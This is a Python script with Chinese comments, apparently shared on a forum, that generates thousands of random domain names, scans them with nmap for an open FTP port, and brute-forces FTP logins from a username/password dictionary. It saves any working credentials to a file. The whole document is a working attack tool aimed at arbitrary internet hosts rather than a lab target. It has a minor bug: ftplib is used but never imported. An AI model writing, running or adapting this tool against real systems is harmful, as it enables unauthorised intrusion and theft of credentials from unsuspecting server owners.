本代码属于使用python3.4版本 主要是交流 高手勿喷!!
#!/usr/bin/python
# -*- coding: utf-8 -*-
import nmap # 需要使用nmap端口扫描工具的支持 这里不仅要安装nmap的python包 还要安装nmap的windows的应用程序 python包 直接使用pip安装即可 至于nmap for windows 的版本如何安装 请直接度娘
from socket import *
import threading
import sys,random,time
import string,os
import configparser ### 配置文件包
"""端口扫描工具 并且判断如果端口21打开 尝试暴力破解FTP"""
screenLock = threading.Semaphore(value=1)
def bruteLogin(hostname, passwdFile):
"""尝试破解FTP"""
pF = open(passwdFile, 'r')
for line in pF.readlines():
time.sleep(1)
userName = line.split(' ')[0]
passWord = line.split(' ')[1].strip('\r').strip('\n')
# print ("[+] 尝试攻击:%s "%hostname+userName+"/"+passWord)
# print("[-]主机:",hostname)
##
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print( '\n[*] ' + str(hostname) +\
' FTP 账号和密码是: '+userName+"/"+passWord)
ftp.quit()
return (userName, passWord)
except Exception:
pass ##尝试失败 重试中
print( '\n[-]FTP %s攻击失败!.'%hostname)
return (None, None)
def nmapScan(tgtip,tgtPort,tgtHost):
nmScan = nmap.PortScanner()
try:
nmScan.scan(tgtip,tgtPort)
state=nmScan[tgtip]['tcp'][int(tgtPort)]['state']
except :
return None
return state
def portScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
return
try:
tgtName = gethostbyaddr(tgtIP) ## 这里是反向查询ip地址对应的DNS 主机名
except :
tgtName = None
setdefaulttimeout(1)
scan = {}
for tgtPort in tgtPorts:
state = nmapScan(tgtIP,str(tgtPort),tgtHost)
if state =="open": ### 发现开放端口 就在字典中写入
if tgtHost not in scan :
scan[tgtHost] = []
scan[tgtHost].append(str(tgtPort))
else:
scan[tgtHost].append(str(tgtPort))
if len(scan)>0: ## 从字典中导出 根据字典中的数据写配置文件
config =configparser.ConfigParser()
config.add_section(tgtHost)
config.set(tgtHost,"IP",tgtIP)
if tgtName!=None:
config.set(tgtHost,"主机名",tgtName[0])
else:
config.set(tgtHost,"主机名","未知")
print("当前线程数: %d 当前扫描主机%s开放的端口有:"%(threading.activeCount()-1,tgtHost),scan[tgtHost])
for x in scan[tgtHost]:
config.set(tgtHost,"端口%s "%x," isopen")
cfgfile = open('IpConfig.ini','a')
config.write(cfgfile)
cfgfile.close()
if "21" in scan[tgtHost]:
print( '\n[+]FTP %s开始攻击!.'%tgtIP)
passwdFile = 'userpass.txt' ##设置ftp弱口令的用户名和密码字典 字典存放的规则是 用户名加空格加密码后换行 类似于: username password\n
res = bruteLogin(tgtIP, passwdFile)
if res[0]!=None:
ftp = open("ftp.txt","a")
ftp.write(tgtIP+" : userName = "+res[0]+" password = "+res[1])
ftp.close()
def gethost(x):
lis = ['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a','1','2','3','4','5','6','7','8','9','0']
s=''
s = (s.join(random.sample(lis, x))).replace(" ","")
ss = [s+".cn",s+".cc",s+".com",s+".net",s+".pw",s+".wang",s+".vip",s+".tv",s+".org",s+".pub"]
return (s,ss)
def main():
driver = "D:\\Python34\\nmap"
os.environ['PATH']=os.environ['PATH']+';'+driver
ho =[]
for x in range(12000):
while True: ##这里是一个避免重复的排除方式
hos,Host =gethost(4) ###这里是随机域名
if hos not in ho:
ho.append(hos)
break
else:
continue
## 21/tcp FTP 文件传输协议
## 22/tcp SSH 安全登录、文件传送(SCP)和端口重定向
## 23/tcp Telnet 不安全的文本传送
## 25/tcp SMTP Simple Mail Transfer Protocol (E-mail)
## 69/udp TFTP Trivial File Transfer Protocol
## 79/tcp finger Finger
## 80/tcp HTTP 超文本传送协议 (WWW)
## 88/tcp Kerberos Authenticating agent
## 110/tcp POP3 Post Office Protocol (E-mail)
## 113/tcp ident old identification server system
## 119/tcp NNTP used for usenet newsgroups
## 220/tcp IMAP3
## 443/tcp HTTPS used for securely transferring web pages
## 3389/tcp windows服务器远程桌面端口
## 445/tcp 共享打印机端口
## 139/tcp 被用于Windows"文件和打印机共享"和SAMBA
Port = [21,] ##需要扫描的端口 这里 是扫描了ftp服务器 所以为了效率 全部只扫描21号端口
for x in Host:
t = threading.Thread(target=portScan,args=(x,Port)) ###开启线程 扫描随机的域名
t.start()
while True:
if threading.activeCount()-1>100: ## 这里做了一个缓冲 限制了最大拥有100多个线程
time.sleep(1)
else:
break
if __name__ == '__main__':
main()